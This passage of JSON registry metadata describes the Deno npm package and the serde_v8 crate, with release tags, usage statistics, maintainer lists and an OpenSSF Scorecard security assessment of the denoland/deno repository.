/tags/v0.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.3/manifests"},{"name":"v0.0.2","sha":"6a8fbc8b522a710699bcf9738c2194dec797b428","kind":"commit","published_at":"2018-08-21T03:43:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.0.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.2/manifests"},{"name":"v0.0.1","sha":"67d89ff692a88ae42145043eac1a5c58413ae110","kind":"commit","published_at":"2018-08-17T16:58:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.0.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.1/manifests"}]},"repo_metadata_updated_at":"2026-08-31T03:03:26.846Z","dependent_packages_count":7,"downloads":535142,"downloads_period":"last-month","dependent_repos_count":7,"rankings":{"downloads":3.2932428594538203,"dependent_repos_count":4.320722161505019,"dependent_packages_count":2.770450546233896,"stargazers_count":10.051852927668895,"forks_count":8.86762447197996,"docker_downloads_count":null,"average":5.860778593368318},"purl":"pkg:npm/deno","advisories":[],"docker_usage_url":"https://docker.ecosyste.ms/usage/npm/deno","docker_dependents_count":null,"docker_downloads_count":null,"usage_url":"https://repos.ecosyste.ms/usage/npm/deno","dependent_repositories_url":"https://repos.ecosyste.ms/api/v1/usage/npm/deno/dependencies","status":null,"funding_links":[],"critical":null,"issue_metadata":{"last_synced_at":"2026-08-30T03:37:30.716Z","issues_count":6632,"pull_requests_count":9650,"avg_time_to_close_issue":17191240.372105263,"avg_time_to_close_pull_request":1531932.6714801444,"issues_closed_count":3798,"pull_requests_closed_count":8032,"pull_request_authors_count":582,"issue_authors_count":2478,"avg_comments_per_issue":2.5061821471652594,"avg_comments_per_pull_request":0.7196891191709844,"merged_pull_requests_count":7013,"bot_issues_count":0,"bot_pull_requests_count":48,"past_year_issues_count":671,"past_year_pull_requests_count":1201,"past_year_avg_time_to_close_issue":1405378.1057268723,"past_year_avg_time_to_close_pull_request":1322346.2602118002,"past_year_issues_closed_count":227,"past_year_pull_requests_closed_count":661,"past_year_pull_request_authors_count":185,"past_year_issue_authors_count":373,"past_year_avg_comments_per_issue":1.2354694485842026,"past_year_avg_comments_per_pull_request":1.11240632805995,"past_year_bot_issues_count":0,"past_year_bot_pull_requests_count":13,"past_year_merged_pull_requests_count":488,"issues_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/issues","maintainers":[{"login":"bartlomieju","count":1799,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/bartlomieju"},{"login":"dsherret","count":1732,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/dsherret"},{"login":"littledivy","count":926,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/littledivy"},{"login":"nathanwhit","count":674,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/nathanwhit"},{"login":"kt3k","count":443,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/kt3k"},{"login":"nayeemrmn","count":374,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/nayeemrmn"},{"login":"lucacasonato","count":353,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lucacasonato"},{"login":"mmastrac","count":314,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/mmastrac"},{"login":"denobot","count":290,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/denobot"},{"login":"crowlKats","count":284,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/crowlKats"},{"login":"iuioiua","count":269,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/iuioiua"},{"login":"devsnek","count":164,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/devsnek"},{"login":"satyarohith","count":150,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/satyarohith"},{"login":"ry","count":110,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ry"},{"login":"magurotuna","count":65,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/magurotuna"},{"login":"losfair","count":26,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/losfair"},{"login":"piscisaureus","count":21,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/piscisaureus"},{"login":"aapoalas","count":18,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/aapoalas"},{"login":"philhawksworth","count":12,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/philhawksworth"},{"login":"arnauorriols","count":10,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/arnauorriols"},{"login":"lucab","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lucab"},{"login":"qti3e","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/qti3e"},{"login":"ashleysyg","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ashleysyg"},{"login":"Elizarspbspb","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Elizarspbspb"},{"login":"RomanDavlyatshin","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/RomanDavlyatshin"},{"login":"aryyawijaya","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/aryyawijaya"},{"login":"leandrohstein","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/leandrohstein"},{"login":"Mohsen-mhm","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Mohsen-mhm"}],"active_maintainers":[{"login":"bartlomieju","count":395,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/bartlomieju"},{"login":"nathanwhit","count":186,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/nathanwhit"},{"login":"littledivy","count":35,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/littledivy"},{"login":"crowlKats","count":34,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/crowlKats"},{"login":"dsherret","count":28,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/dsherret"},{"login":"devsnek","count":11,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/devsnek"},{"login":"denobot","count":10,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/denobot"},{"login":"magurotuna","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/magurotuna"},{"login":"piscisaureus","count":6,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/piscisaureus"},{"login":"lucacasonato","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lucacasonato"},{"login":"ry","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ry"},{"login":"kt3k","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/kt3k"}]},"versions_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/deno/versions","version_numbers_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/deno/version_numbers","latest_version_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/deno/latest_version","dependent_packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/deno/dependent_packages","related_packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/deno/related_packages","codemeta_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/deno/codemeta","maintainers":[{"uuid":"ry","login":"ry","name":null,"email":"ry@tinyclouds.org","url":null,"packages_count":44,"html_url":"https://www.npmjs.com/~ry","role":null,"created_at":"2024-12-12T16:40:47.643Z","updated_at":"2024-12-12T16:40:47.643Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/maintainers/ry/packages"},{"uuid":"denobot","login":"denobot","name":null,"email":"denobot@deno.com","url":null,"packages_count":28,"html_url":"https://www.npmjs.com/~denobot","role":null,"created_at":"2024-12-21T22:16:10.905Z","updated_at":"2024-12-21T22:16:10.905Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/maintainers/denobot/packages"}],"registry":{"name":"npmjs.org","url":"https://registry.npmjs.org","ecosystem":"npm","default":true,"packages_count":5812038,"maintainers_count":1244003,"namespaces_count":426096,"keywords_count":888784,"github":"npm","metadata":{"funded_packages_count":192391,"rate_limit":2},"icon_url":"https://github.com/npm.png","created_at":"2022-04-04T15:19:23.081Z","updated_at":"2026-09-01T05:02:08.896Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages","maintainers_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/maintainers","namespaces_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/namespaces"}},{"id":4284831,"name":"serde_v8","ecosystem":"cargo","description":"Rust to V8 serialization and deserialization","homepage":null,"licenses":"MIT","normalized_licenses":["MIT"],"repository_url":"https://github.com/denoland/deno","keywords_array":[],"namespace":null,"versions_count":325,"first_release_published_at":"2021-03-26T02:41:22.775Z","latest_release_published_at":"2026-08-27T15:19:35.634Z","latest_release_number":"0.320.0","last_synced_at":"2026-09-01T12:19:38.159Z","created_at":"2022-04-13T04:14:51.021Z","updated_at":"2026-09-01T19:18:54.908Z","registry_url":"https://crates.io/crates/serde_v8/","install_command":"cargo install serde_v8","documentation_url":"https://docs.rs/serde_v8/","metadata":{"categories":[]},"repo_metadata":{"id":37251508,"uuid":"133442384","full_name":"denoland/deno","owner":"denoland","description":"A modern runtime for JavaScript and TypeScript.","archived":false,"fork":false,"pushed_at":"2026-08-29T19:17:00.000Z","size":248743,"stargazers_count":108340,"open_issues_count":1540,"forks_count":6359,"subscribers_count":1426,"default_branch":"main","last_synced_at":"2026-08-29T21:56:41.390Z","etag":null,"topics":["deno","javascript","rust","typescript"],"latest_commit_sha":null,"homepage":"https://deno.com","language":"Rust","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/denoland.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":".github/CONTRIBUTING.md","funding":null,"license":"LICENSE.md","code_of_conduct":".github/CODE_OF_CONDUCT.md","threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":".github/SECURITY.md","support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null,"notice":null,"maintainers":null,"copyright":null,"agents":null,"claude":"CLAUDE.md","gemini":null,"cursor":null,"copilot":".github/copilot-instructions.md","dco":null,"cla":null,"disclosure":null}},"created_at":"2018-05-15T01:34:26.000Z","updated_at":"2026-08-29T20:05:41.000Z","dependencies_parsed_at":"2026-08-08T17:34:36.142Z","dependency_job_id":null,"html_url":"https://github.com/denoland/deno","commit_stats":{"total_commits":12946,"total_committers":999,"mean_commits":12.95895895895896,"dds":0.8464390545342191,"last_synced_commit":"9ad0d4c3db85ce9f8007dc088d164bcc7f544708"},"previous_names":[],"tags_count":440,"template":false,"template_full_name":null,"purl":"pkg:github/denoland/deno","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/denoland","download_url":"https://codeload.github.com/denoland/deno/tar.gz/refs/heads/main","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/sbom","scorecard":{"id":334411,"data":{"date":"2025-08-11","repo":{"name":"github.com/denoland/deno","commit":"228574b04210ad54baf04126810e2c113a462bcc"},"scorecard":{"version":"v5.2.1-40-gf6ed084d","commit":"f6ed084d17c9236477efd66e5b258b9d4cc7b389"},"score":5.6,"checks":[{"name":"Maintained","score":10,"reason":"30 commit(s) and 14 issue activity found in the last 90 days -- score normalized to 10","details":null,"documentation":{"short":"Determines if the project is \"actively maintained\".","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#maintained"}},{"name":"Code-Review","score":10,"reason":"all changesets reviewed","details":null,"documentation":{"short":"Determines if the project requires human code review before pull requests (aka merge requests) are merged.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#code-review"}},{"name":"Security-Policy","score":10,"reason":"security policy file detected","details":["Info: security policy file detected: .github/SECURITY.md:1","Info: Found linked content: .github/SECURITY.md:1","Info: Found disclosure, vulnerability, and/or timelines in security policy: .github/SECURITY.md:1","Info: Found text in security policy: .github/SECURITY.md:1"],"documentation":{"short":"Determines if the project has published a security policy.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#security-policy"}},{"name":"CII-Best-Practices","score":0,"reason":"no effort to earn an OpenSSF best practices badge detected","details":null,"documentation":{"short":"Determines if the project has an OpenSSF (formerly CII) Best Practices Badge.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#cii-best-practices"}},{"name":"Token-Permissions","score":0,"reason":"detected GitHub workflow tokens with excessive permissions","details":["Warn: jobLevel 'contents' permission set to 'write': .github/workflows/promote_to_release.yml:24","Warn: no topLevel permission defined: .github/workflows/cargo_publish.yml:1","Warn: topLevel 'contents' permission set to 'write': .github/workflows/ci.yml:5","Warn: no topLevel permission defined: .github/workflows/node_compat_test.yml:1","Warn: no topLevel permission defined: .github/workflows/post_publish.yml:1","Warn: no topLevel permission defined: .github/workflows/pr.yml:1","Warn: no topLevel permission defined: .github/workflows/promote_to_release.yml:1","Warn: no topLevel permission defined: .github/workflows/start_release.yml:1","Warn: no topLevel permission defined: .github/workflows/version_bump.yml:1","Warn: no topLevel permission defined: .github/workflows/wpt_epoch.yml:1"],"documentation":{"short":"Determines if the project's workflows follow the principle of least privilege.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#token-permissions"}},{"name":"License","score":10,"reason":"license file detected","details":["Info: project has a license file: LICENSE.md:0","Info: FSF or OSI recognized license: MIT License: LICENSE.md:0"],"documentation":{"short":"Determines if the project has defined a license.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#license"}},{"name":"Dangerous-Workflow","score":10,"reason":"no dangerous workflow patterns detected","details":null,"documentation":{"short":"Determines if the project's GitHub Action workflows avoid dangerous patterns.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#dangerous-workflow"}},{"name":"Binary-Artifacts","score":5,"reason":"binaries present in source code","details":["Warn: binary detected: tests/specs/npm/pkg_index_ts_and_js/node_modules/package/wasm/index.wasm:1","Warn: binary detected: tests/specs/run/error_bad_wasm_import/toolkit.wasm:1","Warn: binary detected: tests/specs/run/wasm_module/cjs_importing/math.wasm:1","Warn: binary detected: tests/specs/run/wasm_module/table_global_memory/mod.wasm:1","Warn: binary detected: tests/specs/run/wasm_unreachable/unreachable.wasm:1"],"documentation":{"short":"Determines if the project has generated executable (binary) artifacts in the source repository.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#binary-artifacts"}},{"name":"Branch-Protection","score":8,"reason":"branch protection is not maximal on development and all release branches","details":["Info: 'allow deletion' disabled on branch 'main'","Info: 'force pushes' disabled on branch 'main'","Warn: required approving review count is 1 on branch 'main'","Warn: codeowners review is not required on branch 'main'","Info: status check found to merge onto on branch 'main'","Info: PRs are required in order to make changes on branch 'main'"],"documentation":{"short":"Determines if the default and release branches are protected with GitHub's branch protection settings.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#branch-protection"}},{"name":"Signed-Releases","score":0,"reason":"Project has not signed or included provenance with any releases.","details":["Warn: release artifact v2.4.4 not signed: https://api.github.com/repos/denoland/deno/releases/239816232","Warn: release artifact v2.4.3 not signed: https://api.github.com/repos/denoland/deno/releases/236453990","Warn: release artifact v2.4.2 not signed: https://api.github.com/repos/denoland/deno/releases/232832123","Warn: release artifact v2.2.14 not signed: https://api.github.com/repos/denoland/deno/releases/232804459","Warn: release artifact v2.4.1 not signed: https://api.github.com/repos/denoland/deno/releases/230701638","Warn: release artifact v2.4.4 does not have provenance: https://api.github.com/repos/denoland/deno/releases/239816232","Warn: release artifact v2.4.3 does not have provenance: https://api.github.com/repos/denoland/deno/releases/236453990","Warn: release artifact v2.4.2 does not have provenance: https://api.github.com/repos/denoland/deno/releases/232832123","Warn: release artifact v2.2.14 does not have provenance: https://api.github.com/repos/denoland/deno/releases/232804459","Warn: release artifact v2.4.1 does not have provenance: https://api.github.com/repos/denoland/deno/releases/230701638"],"documentation":{"short":"Determines if the project cryptographically signs release artifacts.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#signed-releases"}},{"name":"Packaging","score":10,"reason":"packaging workflow detected","details":["Info: Project packages its releases by way of GitHub Actions.: .github/workflows/npm_publish.yml:16"],"documentation":{"short":"Determines if the project is published as a package that others can easily download, install, easily update, and uninstall.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#packaging"}},{"name":"Pinned-Dependencies","score":0,"reason":"dependency not pinned by hash detected -- score normalized to 0","details":["Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/cargo_publish.yml:28: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/cargo_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/cargo_publish.yml:34: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/cargo_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/cargo_publish.yml:37: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/cargo_publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:790: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:795: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:822: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:829: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:35: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:153: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:182: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:194: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:198: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:202: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:216: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:226: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:240: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:251: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:384: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:401: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:462: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:509: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:522: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:731: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:766: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:22: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:26: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:30: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:34: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:41: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:57: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:61: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:63: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:67: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:74: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/npm_publish.yml:28: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/npm_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/npm_publish.yml:33: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/npm_publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/npm_publish.yml:37: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/npm_publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/post_publish.yml:14: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/post_publish.yml:15: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/post_publish.yml:19: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/post_publish.yml:27: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/pr.yml:16: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/pr.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:30: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:36: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:65: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:73: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:104: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:119: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:125: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:133: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:138: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:155: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/start_release.yml:34: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/start_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/start_release.yml:37: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/start_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/version_bump.yml:35: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/version_bump.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/version_bump.yml:40: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/version_bump.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/version_bump.yml:43: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/version_bump.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/wpt_epoch.yml:27: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/wpt_epoch.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/wpt_epoch.yml:33: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/wpt_epoch.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/wpt_epoch.yml:38: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/wpt_epoch.yml/main?enable=pin","Warn: containerImage not pinned by hash: .devcontainer/Dockerfile:1: pin your Docker image by updating mcr.microsoft.com/devcontainers/rust:1 to mcr.microsoft.com/devcontainers/rust:1@sha256:fc57fb865035c5395e85246c8842b071ced6e7cde727b3c98abbcc794eaf4759","Warn: downloadThenRun not pinned by hash: .devcontainer/Dockerfile:10","Info:   0 out of  25 GitHub-owned GitHubAction dependencies pinned","Info:   0 out of  35 third-party GitHubAction dependencies pinned","Info:   0 out of   1 containerImage dependencies pinned","Info:   0 out of   1 downloadThenRun dependencies 